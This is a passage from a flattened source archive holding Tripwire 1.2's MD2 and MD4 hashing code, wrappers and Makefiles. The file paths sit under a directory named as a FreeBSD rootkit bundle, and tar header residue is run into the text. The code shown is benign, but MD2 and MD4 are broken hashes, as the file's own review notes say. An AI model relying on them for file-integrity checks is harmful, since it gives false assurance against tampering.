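typedef unsigned char *POINTER;

/* UINT2 defines a two byte word */
typedef unsigned short int UINT2;

/* UINT4 defines a four byte word */
/* NOTE(review): unsigned long is 8 bytes on LP64 platforms, so UINT4 is a
   four byte word only where long is 32 bits wide. */
typedef unsigned long int UINT4;

/* PROTO_LIST is defined depending on how PROTOTYPES is defined above.
   If using PROTOTYPES, then PROTO_LIST returns the list, otherwise it
     returns an empty list.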
*/ #if PROTOTYPES #define PROTO_LIST(list) list #else #define PROTO_LIST(list) () #endif fbsdrootkit-1.2/tripwire-1.2/sigs/md2/md2.c100600 764 764 15727 5611466371 15620 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md2.c,v 1.3 1994/07/15 11:03:21 gkim Exp $"; #endif /* MD2C.C - RSA Data Security, Inc., MD2 message-digest algorithm */ /* Copyright (C) 1990-2, RSA Data Security, Inc. Created 1990. All rights reserved. License to copy and use this software is granted for non-commercial Internet Privacy-Enhanced Mail provided that it is identified as the "RSA Data Security, Inc. MD2 Message Digest Algorithm" in all material mentioning or referencing this software or this function. RSA Data Security, Inc. makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this documentation and/or software. */ #include "global.h" #include "md2.h" static void MD2Transform PROTO_LIST ((unsigned char [16], unsigned char [16], unsigned char [16])); static void MD2_memcpy PROTO_LIST ((POINTER, POINTER, unsigned int)); static void MD2_memset PROTO_LIST ((POINTER, int, unsigned int)); /* Permutation of 0..255 constructed from the digits of pi. It gives a "random" nonlinear byte substitution operation. 
*/ static unsigned char PI_SUBST[256] = { 41, 46, 67, 201, 162, 216, 124, 1, 61, 54, 84, 161, 236, 240, 6, 19, 98, 167, 5, 243, 192, 199, 115, 140, 152, 147, 43, 217, 188, 76, 130, 202, 30, 155, 87, 60, 253, 212, 224, 22, 103, 66, 111, 24, 138, 23, 229, 18, 190, 78, 196, 214, 218, 158, 222, 73, 160, 251, 245, 142, 187, 47, 238, 122, 169, 104, 121, 145, 21, 178, 7, 63, 148, 194, 16, 137, 11, 34, 95, 33, 128, 127, 93, 154, 90, 144, 50, 39, 53, 62, 204, 231, 191, 247, 151, 3, 255, 25, 48, 179, 72, 165, 181, 209, 215, 94, 146, 42, 172, 86, 170, 198, 79, 184, 56, 210, 150, 164, 125, 182, 118, 252, 107, 226, 156, 116, 4, 241, 69, 157, 112, 89, 100, 113, 135, 32, 134, 91, 207, 101, 230, 45, 168, 2, 27, 96, 37, 173, 174, 176, 185, 246, 28, 70, 97, 105, 52, 64, 126, 15, 85, 71, 163, 35, 221, 81, 175, 58, 195, 92, 249, 206, 186, 197, 234, 38, 44, 83, 13, 110, 133, 40, 132, 9, 211, 223, 205, 244, 65, 129, 77, 82, 106, 220, 55, 200, 108, 193, 171, 250, 36, 225, 123, 8, 12, 189, 177, 74, 120, 136, 149, 139, 227, 99, 232, 109, 233, 203, 213, 254, 59, 0, 29, 57, 242, 239, 183, 14, 102, 88, 208, 228, 166, 119, 114, 248, 235, 117, 75, 10, 49, 68, 80, 180, 143, 237, 31, 26, 219, 153, 141, 51, 159, 17, 131, 20 }; static unsigned char *PADDING[] = { (unsigned char *)"", (unsigned char *)"\001", (unsigned char *)"\002\002", (unsigned char *)"\003\003\003", (unsigned char *)"\004\004\004\004", (unsigned char *)"\005\005\005\005\005", (unsigned char *)"\006\006\006\006\006\006", (unsigned char *)"\007\007\007\007\007\007\007", (unsigned char *)"\010\010\010\010\010\010\010\010", (unsigned char *)"\011\011\011\011\011\011\011\011\011", (unsigned char *)"\012\012\012\012\012\012\012\012\012\012", (unsigned char *)"\013\013\013\013\013\013\013\013\013\013\013", (unsigned char *)"\014\014\014\014\014\014\014\014\014\014\014\014", (unsigned char *) "\015\015\015\015\015\015\015\015\015\015\015\015\015", (unsigned char *) "\016\016\016\016\016\016\016\016\016\016\016\016\016\016", (unsigned 
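char *) "\017\017\017\017\017\017\017\017\017\017\017\017\017\017\017", (unsigned char *) "\020\020\020\020\020\020\020\020\020\020\020\020\020\020\020\020" };

/* MD2 initialization. Begins an MD2 operation, writing a new context.
   The byte count, the state and the checksum are cleared; the input
   buffer is left as it is because count == 0 marks it empty.
 */
void MD2Init (context)
MD2_CTX *context;                                        /* context */
{
  context->count = 0;
  MD2_memset ((POINTER)context->state, 0, sizeof (context->state));
  MD2_memset
    ((POINTER)context->checksum, 0, sizeof (context->checksum));
}

/* MD2 block update operation. Continues an MD2 message-digest
     operation, processing another message block, and updating the
     context.
   Input is consumed in 16-byte blocks; any tail shorter than a block is
     kept in context->buffer for the next call.
 */
void MD2Update (context, input, inputLen)
MD2_CTX *context;                                        /* context */
unsigned char *input;                                /* input block */
unsigned int inputLen;                     /* length of input block */
{
  unsigned int i, index, partLen;

  /* Update number of bytes mod 16 */
  index = context->count;
  context->count = (index + inputLen) & 0xf;

  /* bytes still missing from the partially filled buffer */
  partLen = 16 - index;

  /* Transform as many times as possible.
    */
  if (inputLen >= partLen) {
    MD2_memcpy
      ((POINTER)&context->buffer[index], (POINTER)input, partLen);
    MD2Transform (context->state, context->checksum, context->buffer);

    for (i = partLen; i + 15 < inputLen; i += 16)
      MD2Transform (context->state, context->checksum, &input[i]);

    index = 0;
  }
  else
    i = 0;

  /* Buffer remaining input */
  MD2_memcpy
    ((POINTER)&context->buffer[index], (POINTER)&input[i],
     inputLen-i);
}

/* MD2 finalization. Ends an MD2 message-digest operation, writing the
     message digest and zeroizing the context.
   The context must be set up again with MD2Init before it is reused.
 */
void MD2Final (digest, context)
unsigned char digest[16];                         /* message digest */
MD2_CTX *context;                                        /* context */
{
  unsigned int index, padLen;

  /* Pad out to multiple of 16.  padLen is in 1..16, so PADDING[padLen]
     is always a valid entry.
   */
  index = context->count;
  padLen = 16 - index;
  MD2Update (context, PADDING[padLen], padLen);

  /* Extend with checksum */
  MD2Update (context, context->checksum, 16);

  /* Store state in digest */
  MD2_memcpy ((POINTER)digest, (POINTER)context->state, 16);

  /* Zeroize sensitive information.
   */
  MD2_memset ((POINTER)context, 0, sizeof (*context));
}

/* MD2 basic transformation. Transforms state and updates checksum
     based on block.
 */
static void MD2Transform (state, checksum, block)
unsigned char state[16];
unsigned char checksum[16];
unsigned char block[16];
{
  unsigned int i, j, t;
  unsigned char x[48];

  /* Form encryption block from state, block, state ^ block.
   */
  MD2_memcpy ((POINTER)x, (POINTER)state, 16);
  MD2_memcpy ((POINTER)x+16, (POINTER)block, 16);
  for (i = 0; i < 16; i++)
    x[i+32] = state[i] ^ block[i];

  /* Encrypt block (18 rounds).
   */
  t = 0;
  for (i = 0; i < 18; i++) {
    for (j = 0; j < 48; j++)
      t = x[j] ^= PI_SUBST[t];
    t = (t + i) & 0xff;
  }

  /* Save new state */
  MD2_memcpy ((POINTER)state, (POINTER)x, 16);

  /* Update checksum.
   */
  t = checksum[15];
  for (i = 0; i < 16; i++)
    t = checksum[i] ^= PI_SUBST[block[i] ^ t];

  /* Zeroize sensitive information.
   */
  MD2_memset ((POINTER)x, 0, sizeof (x));
}

/* Note: Replace "for loop" with standard memcpy if possible.
 */
static void MD2_memcpy (output, input, len)
POINTER output;
POINTER input;
unsigned int len;
{
  unsigned int i;

  for (i = 0; i < len; i++)
    output[i] = input[i];
}

/* Fills len bytes at output with value.
   The stores go through a volatile-qualified pointer: this routine is
   what wipes the work buffer in MD2Transform and the context in
   MD2Final, and an optimizer may otherwise drop stores to memory that
   is never read again.
 */
static void MD2_memset (output, value, len)
POINTER output;
int value;
unsigned int len;
{
  volatile unsigned char *p = (volatile unsigned char *)output;
  unsigned int i;

  for (i = 0; i < len; i++)
    p[i] = (unsigned char)value;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/md2/md2.h100600 764 764 2276 5434607532 15577 0ustar dfdf/* $Id: md2.h,v 1.2 1993/08/19 05:27:54 genek Exp $ */ /* MD2.H - header file for MD2C.C */ /* Copyright (C) 1990-2, RSA Data Security, Inc. Created 1990. All rights reserved. License to copy and use this software is granted for non-commercial Internet Privacy-Enhanced Mail provided that it is identified as the "RSA Data Security, Inc. MD2 Message Digest Algorithm" in all material mentioning or referencing this software or this function. RSA Data Security, Inc.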
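makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this documentation and/or software. */

typedef struct {
  unsigned char state[16];                                 /* state */
  unsigned char checksum[16];                           /* checksum */
  unsigned int count;                 /* number of bytes, modulo 16 */
  unsigned char buffer[16];                         /* input buffer */
} MD2_CTX;

void MD2Init ();
void MD2Update ();
void MD2Final ();

int sig_md2_get();
fbsdrootkit-1.2/tripwire-1.2/sigs/md2/md2wrapper.c100600 764 764 3630 5614757135 17173 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md2wrapper.c,v 1.8 1994/07/25 15:46:37 gkim Exp $"; #endif /* * md2wrapper.c * * signature function hook for MD2 (the RSA Data Security, Inc. MD2 * Message Digesting Algorithm) for Tripwire. * * The original MD2 code is contained in md2.c in its entirety. * * Gene Kim * Purdue University * September 27, 1992 */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "global.h" #include "md2.h" #include "../../include/sigs.h" #define BUFSIZE 4096 static MD2_CTX mdbucket; /* MD2 data structure */ char *btob64();

/*
 * int
 * pf_signature(int fd_in, char *ps_signature, int siglen)
 *
 *	fd_in:		input file descriptor; it is repositioned to
 *			offset 0 and read to end of file
 *	ps_signature:	array where the NUL-terminated signature is stored
 *	siglen:		length of the signature array; checked before the
 *			hexadecimal form is written
 *
 * Returns 0.  Failures are reported on stderr and end the process with
 * exit(1).  The digest context is the file-scope mdbucket, so the routine
 * is not reentrant.
 *
 * NOTE(review): the base-64 branch passes ps_signature to btob64() with no
 * length; confirm btob64()'s output size against siglen at the caller.
 * NOTE(review): MD2 was moved to Historic status by RFC 6149 and should not
 * be the only signature relied on for a file.
 */
int
sig_md2_get (fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    unsigned char buffer[BUFSIZE];
    unsigned char digest[16];
    MD2_CTX *mdbuf = &mdbucket;
    int readin;
    int i;

    ps_signature[0] = '\0';

    /* two hex digits per digest byte plus the terminating NUL */
    if (printhex && siglen < 2 * (int) sizeof(digest) + 1) {
	fprintf(stderr, "sig_md2_get: signature buffer too small\n");
	exit(1);
    }

    /* rewind the file descriptor */
    if (lseek(fd_in, (off_t) 0, SEEK_SET) < 0) {
	perror("sig_md2_get: lseek()");
	exit(1);
    }

    MD2Init (mdbuf);
    /* read() takes a size_t count; sizeof supplies one even when no
     * prototype is in scope */
    while ((readin = read(fd_in, (char *)buffer, sizeof(buffer))) > 0) {
	MD2Update(mdbuf, buffer, (unsigned int) readin);
    }
    if (readin < 0) {
	perror("sig_md2_get: read()");
	exit(1);
    }
    MD2Final (digest, mdbuf);

    if (printhex) {
	char *pc = ps_signature;

	/* digest[] is unsigned char, so "%02x" is the matching conversion.
	 * The earlier "#if (TW_TYPE32 == int)" selected nothing: the
	 * preprocessor replaces identifiers that are not macros, keywords
	 * included, with 0. */
	for (i = 0; i < 16; i++) {
	    sprintf(pc, "%02x", digest[i]);
	    pc += 2;
	}
    }
    /* base 64 */
    else {
	btob64(digest, ps_signature, 128);
    }

    return 0;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/md4/ 40700 764 764 0 5630552015 14631 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/md4/Makefile100600 764 764 470 5474057130 16355 0ustar dfdf# $Id: Makefile,v 1.4 1993/11/22 06:38:16 genek Exp $ # # Makefile for MD4 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: md4.o md4wrapper.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf md4.o md4wrapper.o .pure md4.o: ../../include/byteorder.h md4wrapper.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/md4/md4.c100600 764 764 23260 5614757140 15613 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md4.c,v 1.5 1994/07/25 15:46:40 gkim Exp $"; #endif /* ** ************************************************************************** ** md4.c -- Implementation of MD4 Message Digest Algorithm ** ** Updated: 2/16/90 by Ronald L. Rivest ** ** (C) 1990 RSA Data Security, Inc. ** ** ************************************************************************** */ /* ** To use MD4: ** -- Include md4.h in your program ** -- Declare an MDstruct MD to hold the state of the digest computation. ** -- Initialize MD using MDbegin(&MD) ** -- For each full block (64 bytes) X you wish to process, call ** MDupdate(&MD,X,512) ** (512 is the number of bits in a full block.) ** -- For the last block (less than 64 bytes) you wish to process, ** MDupdate(&MD,X,n) ** where n is the number of bits in the partial block. A partial ** block terminates the computation, so every MD computation should ** terminate by processing a partial block, even if it has n = 0.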
** -- The message digest is available in MD.buffer[0] ... MD.buffer[3]. ** (Least-significant byte of each word should be output first.) ** -- You can print out the digest using MDprint(&MD) */ /* Implementation notes: ** This implementation assumes that ints are 32-bit quantities. ** If the machine stores the least-significant byte of an int in the ** least-addressed byte (eg., VAX and 8086), then LOWBYTEFIRST should be ** set to TRUE. Otherwise (eg., SUNS), LOWBYTEFIRST should be set to ** FALSE. Note that on machines with LOWBYTEFIRST FALSE the routine ** MDupdate modifies has a side-effect on its input array (the order of bytes ** in each word are reversed). If this is undesired a call to MDreverse(X) can ** reverse the bytes of X back into order after each call to MDupdate. */ #define TRUE 1 #define FALSE 0 /* Compile-time includes */ #include "../../include/config.h" #include #ifdef STDLIBH #include #endif #include "../../include/byteorder.h" #include "md4.h" /* Compile-time declarations of MD4 ``magic constants''. */ #define I0 0x67452301 /* Initial values for MD buffer */ #define I1 0xefcdab89 #define I2 0x98badcfe #define I3 0x10325476 #define C2 013240474631 /* round 2 constant = sqrt(2) in octal */ #define C3 015666365641 /* round 3 constant = sqrt(3) in octal */ /* C2 and C3 are from Knuth, The Art of Programming, Volume 2 ** (Seminumerical Algorithms), Second Edition (1981), Addison-Wesley. ** Table 2, page 660. */ #define fs1 3 /* round 1 shift amounts */ #define fs2 7 #define fs3 11 #define fs4 19 #define gs1 3 /* round 2 shift amounts */ #define gs2 5 #define gs3 9 #define gs4 13 #define hs1 3 /* round 3 shift amounts */ #define hs2 9 #define hs3 11 #define hs4 15 /* Compile-time macro declarations for MD4. ** Note: The ``rot'' operator uses the variable ``tmp''. ** It assumes tmp is declared as unsigned int, so that the >> ** operator will shift in zeros rather than extending the sign bit. 
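*/
#define f(X,Y,Z)             ((X&Y) | ((~X)&Z))
#define g(X,Y,Z)             ((X&Y) | (X&Z) | (Y&Z))
#define h(X,Y,Z)             (X^Y^Z)
/* rotate X left by S bits; the shift operators of this macro had been
** lost from the listing and are restored here.
*/
#define rot(X,S)             (tmp=X,(tmp<<S) | (tmp>>(32-S)))
#define ff(A,B,C,D,i,s)      A = rot((A + f(B,C,D) + X[i]),s)
#define gg(A,B,C,D,i,s)      A = rot((A + g(B,C,D) + X[i] + C2),s)
#define hh(A,B,C,D,i,s)      A = rot((A + h(B,C,D) + X[i] + C3),s)

/* MDprint(MDp)
** Print message digest buffer MDp as 32 hexadecimal digits.
** Order is from low-order byte of buffer[0] to high-order byte of buffer[3].
** Each byte is printed with high-order hexadecimal digit first.
** This is a user-callable routine.
*/
void
MDprint(MDp)
MDptr MDp;
{
  int i,j;

  for (i=0;i<4;i++)
    for (j=0;j<32;j=j+8)
      printf("%02x",(MDp->buffer[i]>>j) & 0xFF);
}

/* scratch words filled in by MDsprint() */
long lbuf[4];

/* MDsprint(dest, MDp)
** Write the digest into dest as 32 lower-case hexadecimal digits followed
** by a NUL, in the same byte order MDprint uses.  dest must have room for
** 33 bytes; nothing here checks that.
** Each word is formatted low-order byte first, read back into lbuf[] and
** then written as eight hex digits.
*/
void
MDsprint(dest, MDp)
char *dest;
MDptr MDp;
{
  int i,j;
  char s[200], *pc;

  for (i=0;i<4;i++) {
    pc = s;
    for (j=0;j<32;j=j+8) {
      sprintf(pc, "%02x",(MDp->buffer[i]>>j) & 0xFF);
      pc += 2;
    }
    /* "%lx" stores through an unsigned long pointer */
    sscanf(s, "%lx", (unsigned long *)&lbuf[i]);
  }

  for (i = 0, pc = dest; i < 4; i++, pc += 8) {
    sprintf(pc, "%08lx", (unsigned long)lbuf[i]);
  }
}

extern char *pltob64();

/* MDsprint64(dest, MDp)
** Hand the four digest words to pltob64(), which writes the encoded form
** into dest.
** NOTE(review): the output length is decided by pltob64(), which is not
** defined in this file; confirm the size of dest at the caller.
*/
void
MDsprint64(dest, MDp)
char *dest;
MDptr MDp;
{
  pltob64(MDp->buffer, dest, 4);
}

/* MDbegin(MDp)
** Initialize message digest buffer MDp.
** Loads I0..I3 into the buffer and clears the bit count and done flag.
** This is a user-callable routine.
*/
void
MDbegin(MDp)
MDptr MDp;
{
  int i;

  MDp->buffer[0] = I0;
  MDp->buffer[1] = I1;
  MDp->buffer[2] = I2;
  MDp->buffer[3] = I3;
  for (i=0;i<8;i++)
    MDp->count[i] = 0;
  MDp->done = 0;
}

/* MDreverse(X)
** Reverse the byte-ordering of every int in X.
** Assumes X is an array of 16 ints.
** The macro revx reverses the byte-ordering of the next word of X.
*/
#define revx { t = (*X << 16) | (*X >> 16); \
	       *X++ = ((t & 0xFF00FF00) >> 8) | ((t & 0x00FF00FF) << 8); }
void
MDreverse(X)
unsigned int *X;
{
  register unsigned int t;

  /* one revx per word, 16 words in all */
  revx; revx; revx; revx; revx; revx; revx; revx;
  revx; revx; revx; revx; revx; revx; revx; revx;
}

/* MDblock(MDp,X) ** Update message digest buffer MDp->buffer using 16-word data block X. ** Assumes all 16 words of X are full of data.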
** Does not update MDp->count.
** This routine is not user-callable.
**
** X is read as 16 unsigned ints, so the caller must pass storage that is
** suitably aligned for unsigned int.
** When BYTEORDER is 0x4321 the words of X are byte-reversed in place by
** MDreverse() before use, so the caller's block is modified.
*/
static void
MDblock(MDp,X)
MDptr MDp;
unsigned int *X;
{
  /* tmp is the scratch variable the rot() macro assigns to */
  register unsigned int tmp, A, B, C, D;

#if BYTEORDER == 0x4321
  MDreverse(X);
#endif

  A = MDp->buffer[0];
  B = MDp->buffer[1];
  C = MDp->buffer[2];
  D = MDp->buffer[3];
  /* Update the message digest buffer */
  ff(A , B , C , D , 0 , fs1); /* Round 1 */
  ff(D , A , B , C , 1 , fs2);
  ff(C , D , A , B , 2 , fs3);
  ff(B , C , D , A , 3 , fs4);
  ff(A , B , C , D , 4 , fs1);
  ff(D , A , B , C , 5 , fs2);
  ff(C , D , A , B , 6 , fs3);
  ff(B , C , D , A , 7 , fs4);
  ff(A , B , C , D , 8 , fs1);
  ff(D , A , B , C , 9 , fs2);
  ff(C , D , A , B , 10 , fs3);
  ff(B , C , D , A , 11 , fs4);
  ff(A , B , C , D , 12 , fs1);
  ff(D , A , B , C , 13 , fs2);
  ff(C , D , A , B , 14 , fs3);
  ff(B , C , D , A , 15 , fs4);
  gg(A , B , C , D , 0 , gs1); /* Round 2 */
  gg(D , A , B , C , 4 , gs2);
  gg(C , D , A , B , 8 , gs3);
  gg(B , C , D , A , 12 , gs4);
  gg(A , B , C , D , 1 , gs1);
  gg(D , A , B , C , 5 , gs2);
  gg(C , D , A , B , 9 , gs3);
  gg(B , C , D , A , 13 , gs4);
  gg(A , B , C , D , 2 , gs1);
  gg(D , A , B , C , 6 , gs2);
  gg(C , D , A , B , 10 , gs3);
  gg(B , C , D , A , 14 , gs4);
  gg(A , B , C , D , 3 , gs1);
  gg(D , A , B , C , 7 , gs2);
  gg(C , D , A , B , 11 , gs3);
  gg(B , C , D , A , 15 , gs4);
  hh(A , B , C , D , 0 , hs1); /* Round 3 */
  hh(D , A , B , C , 8 , hs2);
  hh(C , D , A , B , 4 , hs3);
  hh(B , C , D , A , 12 , hs4);
  hh(A , B , C , D , 2 , hs1);
  hh(D , A , B , C , 10 , hs2);
  hh(C , D , A , B , 6 , hs3);
  hh(B , C , D , A , 14 , hs4);
  hh(A , B , C , D , 1 , hs1);
  hh(D , A , B , C , 9 , hs2);
  hh(C , D , A , B , 5 , hs3);
  hh(B , C , D , A , 13 , hs4);
  hh(A , B , C , D , 3 , hs1);
  hh(D , A , B , C , 11 , hs2);
  hh(C , D , A , B , 7 , hs3);
  hh(B , C , D , A , 15 , hs4);

  /* add the block's result into the running digest words */
  MDp->buffer[0] += A;
  MDp->buffer[1] += B;
  MDp->buffer[2] += C;
  MDp->buffer[3] += D;
}

/* MDupdate(MDp,X,count) ** Input: MDp -- an MDptr ** X -- a pointer to an array of unsigned characters.
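**         count -- the number of bits of X to use.
**           (if not a multiple of 8, uses high bits of last byte.)
** Update MDp using the number of bits of X given by count.
** This is the basic input routine for an MD4 user.
** The routine completes the MD computation when count < 512, so
** every MD computation should end with one call to MDupdate with a
** count less than 512.  A call with count 0 will be ignored if the
** MD has already been terminated (done != 0), so an extra call with count
** 0 can be given as a ``courtesy close'' to force termination if desired.
**
** A count above 512 is rejected before the running bit count is changed,
** so a bad call no longer corrupts the length that goes into the padding.
** For a partial block only the bytes that carry message bits are read
** from X; the byte after the data is not touched when count is a multiple
** of 8.
** NOTE(review): the full-block path hands X itself to MDblock() as an
** unsigned int pointer, so X has to be aligned for unsigned int, and on
** BYTEORDER 0x4321 builds MDblock() byte-reverses X in place.
*/
void
MDupdate(MDp,X,count)
MDptr MDp;
unsigned char *X;
unsigned int count;
{
  unsigned int i, carry, bit, byte, mask;
  /* the union keeps the padded block aligned for MDblock() */
  union {
    unsigned int  w[16];
    unsigned char b[64];
  } blk;
  unsigned char *p;

  /* return with no error if this is a courtesy close with count
  ** zero and MDp->done is true.
  */
  if (count == 0 && MDp->done) return;

  /* check to see if MD is already done and report error */
  if (MDp->done)
    { printf("\nError: MDupdate MD already done."); return; }

  /* Check for count too large */
  if (count > 512)
    { printf("\nError: MDupdate called with illegal count value %u.",count);
      return;
    }

  /* Add count to MDp->count, one byte at a time with carry */
  carry = count;
  p = MDp->count;
  while (carry)
    { carry += *p;
      *p++ = carry;
      carry = carry >> 8;
    }

  /* Process data */
  if (count == 512)
    { /* Full block of data to handle */
      MDblock(MDp,(unsigned int *)X);
      return;
    }

  /* partial block -- must be last block so finish up */

  /* Find out how many bytes and residual bits there are */
  byte = count >> 3;
  bit =  count & 7;

  /* Copy X into the work block since we need to modify it */
  for (i=0;i<byte;i++) blk.b[i] = X[i];
  blk.b[byte] = bit ? X[byte] : 0;
  for (i=byte+1;i<64;i++) blk.b[i] = 0;

  /* Add padding '1' bit and low-order zeros in last byte */
  mask = 1 << (7 - bit);
  blk.b[byte] = (blk.b[byte] | mask) & ~( mask - 1);

  /* If room for bit count, finish up with this block */
  if (byte <= 55)
    { for (i=0;i<8;i++) blk.b[56+i] = MDp->count[i];
      MDblock(MDp,blk.w);
    }
  else /* need to do two blocks to finish up */
    { MDblock(MDp,blk.w);
      for (i=0;i<56;i++) blk.b[i] = 0;
      for (i=0;i<8;i++)  blk.b[56+i] = MDp->count[i];
      MDblock(MDp,blk.w);
    }

  /* Set flag saying we're done with MD computation */
  MDp->done = 1;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/md4/md4.h100600 764 764 3600 5434607537 15600 0ustar dfdf/* $Id: md4.h,v 1.2 1993/08/19 05:27:59 genek Exp $ */ /* ** ************************************************************************** ** md4.h -- Header file for implementation of MD4 Message Digest Algorithm ** ** Updated: 2/13/90 by Ronald L. Rivest ** ** (C) 1990 RSA Data Security, Inc. ** ** ************************************************************************** */ /* MDstruct is the data structure for a message digest computation. */ typedef struct { unsigned int buffer[4]; /* Holds 4-word result of MD computation */ unsigned char count[8]; /* Number of bits processed so far */ unsigned int done; /* Nonzero means MD computation finished */ } MDstruct, *MDptr; /* MDbegin(MD) ** Input: MD -- an MDptr ** Initialize the MDstruct prepatory to doing a message digest computation. */ extern void MDbegin(); /* MDupdate(MD,X,count) ** Input: MD -- an MDptr ** X -- a pointer to an array of unsigned characters. ** count -- the number of bits of X to use (an unsigned int). ** Updates MD using the first ``count'' bits of X. ** The array pointed to by X is not modified. ** If count is not a multiple of 8, MDupdate uses high bits of last byte. ** This is the basic input routine for a user. ** The routine terminates the MD computation when count < 512, so ** every MD computation should end with one call to MDupdate with a ** count less than 512. Zero is OK for a count. */ extern void MDupdate(); /* MDprint(MD) ** Input: MD -- an MDptr ** Prints message digest buffer MD as 32 hexadecimal digits. ** Order is from low-order byte of buffer[0] to high-order byte of buffer[3]. ** Each byte is printed with high-order hexadecimal digit first.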
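*/ extern void MDprint(); /* ** End of md4.h ****************************(cut)*****************************************/ int sig_md4_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/md4/md4wrapper.c100600 764 764 3562 5614757141 17200 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: md4wrapper.c,v 1.8 1994/07/25 15:46:41 gkim Exp $"; #endif /* * md4wrapper.c * * signature function hook for MD4 (the RSA Data Security, Inc. MD4 * Message Digesting Algorithm) for Tripwire. * * The original MD4 code is contained in md4.c in its entirety. * * Gene Kim * Purdue University * October 14, 1992 */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "../../include/sigs.h" #include "md4.h" #define BUFSIZE 64 /* limit of in-struct buffer size */ static MDstruct mdbucket; /* MD4 data structure */ extern void MDsprint(), MDsprint64();

/*
 * int
 * pf_signature(int fd_in, char *ps_signature, int siglen)
 *
 *	fd_in:		input file descriptor; it is read through a
 *			dup()ed stdio stream, and because the duplicate
 *			shares its file offset the rewind also moves fd_in
 *	ps_signature:	array where the NUL-terminated signature is stored
 *	siglen:		length of the signature array; checked before the
 *			hexadecimal form is written
 *
 * Returns 0.  Failures are reported on stderr and end the process with
 * exit(1), so a partial read never yields a signature.  The digest state
 * is the file-scope mdbucket, so the routine is not reentrant.
 *
 * BUFSIZE is one MD4 block (64 bytes): MDupdate() treats any shorter
 * chunk as the final block, so the stream has to be read in whole blocks.
 *
 * NOTE(review): the base-64 branch passes ps_signature to MDsprint64()
 * with no length; confirm its output size against siglen at the caller.
 * NOTE(review): MD4 is no longer collision resistant (RFC 6150 retires
 * it), so it should not be the only signature relied on for a file.
 */
int
sig_md4_get (fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    unsigned char buffer[BUFSIZE];
    MDstruct *mdbuf = &mdbucket;
    FILE *fp;
    size_t got;

    ps_signature[0] = '\0';

    /* MDsprint() writes 32 hex digits plus the terminating NUL */
    if (printhex && siglen < 33) {
	fprintf(stderr, "sig_md4_get: signature buffer too small\n");
	exit(1);
    }

    /* get stdio handle
     * we use dup() so we can close() it later
     */
    if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) {
	perror("sig_md4_get: fdopen()");
	exit(1);
    }

    /* rewind the file descriptor */
    rewind(fp);

    MDbegin (mdbuf);
    while ((got = fread(buffer, 1, BUFSIZE, fp)) > 0) {
	/* MDupdate() counts in bits and has no prototype in md4.h, so
	 * the argument is converted to unsigned int explicitly */
	MDupdate(mdbuf, buffer, (unsigned int) (got * 8));
    }
    /* fread() never returns a negative count; a read error is only
     * visible through the stream's error indicator */
    if (ferror(fp)) {
	perror("sig_md4_get: read()");
	exit(1);
    }
    /* courtesy close: ends the digest when the length was a multiple of
     * the block size, ignored when a short block already ended it */
    MDupdate(mdbuf, buffer, (unsigned int) 0);

    if (printhex) {
	MDsprint(ps_signature, mdbuf);
    }
    else {
	MDsprint64(ps_signature, mdbuf);
    }

    fclose(fp);
    return 0;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/md5/ 40700 764 764 0 5630552016 14633 5ustar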
dfdffbsdrootkit-1.2/tripwire-1.2/sigs/md5/Makefile100600 764 764 465 5474057132 16364 0ustar dfdf# $Id: Makefile,v 1.3 1993/11/22 06:38:18 genek Exp $ # # Makefile for md5 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: md5.o md5wrapper.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf md5.o md5wrapper.o .pure md5.o: ../../include/byteorder.h md5wrapper.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/md5/README.md5100600 764 764 5017 5434607543 16311 0ustar dfdf# $Id: README.md5,v 1.2 1993/08/19 05:28:03 genek Exp $ /*********************************************************************** ** md5.c -- the source code for MD5 routines ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 1/91 SRD,AJ,BSK,JT Reference C Version ** ** Revised (for MD5): RLR 4/27/91 ** *********************************************************************** ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. ** ** License to copy and use this software is granted provided that ** ** it is identified as the "RSA Data Security, Inc. MD5 Message- ** ** Digest Algorithm" in all material mentioning or referencing this ** ** software or this function. ** ** License is also granted to make and use derivative works ** ** provided that such works are identified as "derived from the RSA ** ** Data Security, Inc. MD5 Message-Digest Algorithm" in all ** ** material mentioning or referencing the derived work. ** ** RSA Data Security, Inc. makes no representations concerning ** ** either the merchantability of this software or the suitability ** ** of this software for any particular purpose. It is provided "as ** ** is" without express or implied warranty of any kind. ** ** These notices must be retained in any copies of any part of this ** ***********************************************************************/ The MD5 message-digesting package is copyrighted by RSA Data Security, Inc. 
